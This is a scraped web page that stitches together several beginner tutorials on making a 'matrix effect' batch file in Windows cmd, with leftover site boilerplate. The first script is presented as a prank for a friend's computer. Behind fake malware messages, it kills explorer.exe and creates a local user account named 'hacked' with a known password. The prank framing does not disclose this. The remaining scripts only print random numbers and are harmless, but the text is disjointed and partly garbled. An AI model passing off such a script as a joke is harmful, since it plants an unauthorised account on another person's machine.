Hello guys today m gonna teach you how you easily can make a matrix effect in cmd and can prank in your friends computer Its very easy to do.Just follow my steps and enjoy.
First of all open notepad and copy the given code in notepad and save it as batch file i.e example.bat
CODES
@echo off
taskkill /f /im explorer.exe
color 2
:prank
pause
echo malicous malware has been detected on your computer…
pause
echo attempting to contact your local windows firewall…
pause
echo access was denied…try again
pause
echo TROJAN INSTALLED
net user hacked /add
net user hacked hacker
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
pause
echo lmao you just got pranked :p
pause
:end prank
Introduction: Matrix Command Prompt (WITH COLOR!!)
Many of you all know the cool trick with command prompt that makes it look like matrix. You probably didn’t know you can change the colors.
In the code it says «color 0a».
I learned this from minecraft… &a = green and &0 = black. So I changed «a» to «b» and it changed the numbers blue. I also changed «0» to «f» and it made the background white.
In the instructions I will leave the color codes for the background and numbers along with the matrix code
Step 1: The Setup
1. Go to notepad
You can do this by pressing the windows logo and r at the same time.
Step 2: The Code
Here is the code
Copy between the lines
———————————
@echo off
color 0a
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto top
———————————
Make sure on notepads «%random%» is on one line and not two
Now on line two it says «color 0a»
I’m going to show colors you can change it to
A green
B blue
F white
C pinkish red
E light yellow
D purple pinkish
1 dark blue
2 dark green
3 cyan blue
4 red
5 dark violet
6 yellow
7 light grey
8 dark grey
9 bluefish grey :/
0 black
So. Color 0a change 0 to any color for background ad for colors numbers
Step 3: Saving the Notepad
Now save it
On the top right corner it says «file»
Click it then it says «save as»
Save it as «example.bat»
Example means… Well… Example
.bat is important meaning «batch»
Step 4: Open It!!
Enjoy!!!
Provide feedback
Saved searches
Use saved searches to filter your results more quickly
Sign up
there are following steps for create an matrix for cmd in notepad.
1.Open notepad
2.write following code in notepad.
@echo off
title Matrix
color 0a
mode 1000
echo Hello Programmer!!! welcome to jarvis world!!!!!
pause
cls
goto Greeting:Greeting
echo i’ve been watching you.
pause
cls
echo this is the Matrix!!!!goto Matrix
:matrix
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
PING 1.1.1.1 -n 1 -w 0.3 >NUL
goto Matrix
4.Now save in the notepad , Click “File” and then “Save As.” Save your file as a Batch file: “Matrix.bat”.
5.Run the batch file as administrator. or you can be open the file then it will run.
6.after running cmd screen will be appear like following picture
7.press enter once again then your matrix will be start running and then it will look like
8.finally your matrix is running now enjoy .it really amazing.any query ask in comment or can contact me.all the best!!!
9.there are link in below for video of matrix ,go there and watch matrix video
